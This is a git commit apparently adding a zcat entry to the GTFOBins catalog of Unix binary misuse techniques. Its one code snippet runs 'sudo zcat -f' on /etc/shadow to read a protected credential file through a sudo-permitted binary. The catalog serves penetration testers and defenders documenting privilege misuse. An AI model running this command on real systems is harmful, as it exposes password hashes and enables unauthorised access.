GTFOBINS: Added zcat

This commit is contained in:
ishtar 2024-09-04 11:23:05 +02:00
parent 61314d55d0
commit e2b50542f0

7
_gtfobins/zcat.md Normal file
View File

@ -0,0 +1,7 @@
---
functions:
sudo:
- code: |
LFILE="/etc/shadow" # or any other file
sudo zcat -f "$LFILE"
---